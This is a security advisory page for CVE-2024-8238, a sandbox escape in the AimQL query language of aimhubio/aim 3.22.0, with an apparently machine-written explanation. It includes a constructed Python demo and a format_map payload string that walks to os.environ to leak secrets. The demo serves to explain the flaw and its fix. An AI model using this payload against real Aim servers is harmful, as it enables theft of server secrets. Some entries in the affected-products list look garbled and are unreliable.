VYPR
Moderate severity · NVD Advisory · Published Mar 20, 2025 · Updated Oct 15, 2025

Unrestricted Code Execution in aimhubio/aim

CVE-2024-8238

Description

In version 3.22.0 of aimhubio/aim, the AimQL query language uses an outdated version of the safer_getattr() function from RestrictedPython. This version does not protect against the str.format_map() method, allowing an attacker to leak server-side secrets or potentially gain unrestricted code execution. The vulnerability arises because str.format_map() can read arbitrary attributes of Python objects, enabling attackers to access sensitive variables such as os.environ. If an attacker can write files to a known location on the Aim server, they can use str.format_map() to load a malicious .dll/.so file into the Python interpreter, leading to unrestricted code execution.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Aim 3.22.0's AimQL uses outdated RestrictedPython, allowing str.format_map() to leak secrets or achieve RCE via malicious DLL/SO loading.

Vulnerability

Overview

CVE-2024-8238 affects aimhubio/aim version 3.22.0. The AimQL query language relies on an outdated version of the safer_getattr() function from RestrictedPython, which does not block the str.format_map() method [2]. A format string resolves dotted attribute lookups and bracketed item lookups on its own, so once restricted code is allowed to call format_map() it can walk from any object in the query namespace to values the guard was meant to hide, such as os.environ, leaking server-side secrets.

Exploitation

Details

To exploit the leak, an attacker only needs to send a crafted AimQL query whose string calls format_map() with a replacement field that traverses attributes and items; the traversal happens inside format_map(), so the safer_getattr() guard never sees the intermediate (often underscore-prefixed) names and no function call by the attacker is required. For full remote code execution, the attacker must also be able to write files to a known location on the Aim server [4]. With that access, they can use str.format_map() to load a malicious dynamic library (.dll on Windows or .so on Linux) into the Python interpreter, achieving unrestricted code execution; the advisory does not spell out which lookup performs the load, only that the file must already exist at a path the attacker knows.
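The following is an added example, not code from Aim or from RestrictedPython. It models the guard on the behaviour the advisory describes (an outdated safer_getattr() that refuses str.format() but not str.format_map(), beside a current one that refuses both) and shows why the leak works: the attacker's replacement field never calls anything, yet it reaches os.environ through the __init__.__globals__ of an ordinary class. The class Run, the guard builder, the DEMO_SECRET variable and the payload are all constructed for the demonstration; the guard code is a stand-in written from the advisory's description, not RestrictedPython's own source.

```python
import os

# Constructed stand-in for a module-level class that restricted query code can
# reach. Its __init__ is a plain Python function, so __init__.__globals__ is this
# module's namespace, which contains the ``os`` module imported above.
class Run:
    def __init__(self, name):
        self.name = name


# Assumption, modeled on the advisory: the outdated guard only knew about
# str.format(); the current guard also refuses str.format_map().
OLD_BLOCKED = ("format",)
NEW_BLOCKED = ("format", "format_map")


def make_guard(blocked):
    """Build a safer_getattr-style guard (stand-in, not RestrictedPython's code).

    It refuses the listed str methods and any underscore-prefixed attribute
    name, which is the usual shape of such a guard.
    """
    def guard(obj, name, default=None):
        if isinstance(obj, str) and name in blocked:
            raise NotImplementedError(f"str.{name}() is not allowed in restricted code")
        if name.startswith("_"):
            raise AttributeError(f"{name!r} is an invalid attribute name")
        return getattr(obj, name, default)
    return guard


# Constructed attacker payload. Every step is an attribute or item lookup that
# str.format_map() performs itself: the guard above is only ever asked for the
# name "format_map", so its underscore check never sees __init__ or __globals__.
PAYLOAD = "{run.__init__.__globals__[os].environ[DEMO_SECRET]}"


def run_query(guard, template, run):
    """Simulate restricted code that fetches template.format_map via the guard
    and calls it with the query's namespace."""
    format_map = guard(template, "format_map")   # raises under the current guard
    return format_map({"run": run})


def demo():
    """Return (value leaked under the old guard, whether the new guard blocked it)."""
    os.environ["DEMO_SECRET"] = "hunter2"        # constructed server-side secret
    run = Run("exp-1")
    leaked = run_query(make_guard(OLD_BLOCKED), PAYLOAD, run)
    try:
        run_query(make_guard(NEW_BLOCKED), PAYLOAD, run)
        blocked = False
    except NotImplementedError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("old guard leaked:", leaked)
    print("new guard blocked:", blocked)
```

The payload contains no parentheses and never touches a dunder name through the guard, which is why an attribute-name denylist applied at getattr() time cannot stop it: the only effective check is to refuse handing out the format methods of str at all, as the current guard does.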

Impact

The primary impact is information disclosure of sensitive environment variables. In scenarios where the attacker can write files to the server, the vulnerability escalates to arbitrary code execution, potentially compromising the entire system.

Mitigation

The vulnerability is present in Aim version 3.22.0. Users should upgrade to a release that depends on a RestrictedPython version whose safer_getattr() refuses both str.format() and str.format_map() [1]. As of the publication date, no patched version is listed, so the community is advised to monitor the project repository for updates. Until then, treat the AimQL query endpoint as able to read the server process's environment: expose it only to trusted users, keep secrets out of the environment of the Aim process where possible, and do not grant untrusted users any way to write files to paths on the Aim server, since that is what turns the leak into code execution.

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: aim (PyPI)
Affected versions: >= 3.0.0, <= 3.22.0
Patched versions: none listed

Affected products

  • Aimhubio/Aimllm-fuzzy
    Range: = 3.22.0
  • ghsa-coords
    Range: >= 3.0.0, <= 3.22.0
  • aimhubio/aimhubio/aimv5
    Range: unspecified

Patches


No patches discovered yet.


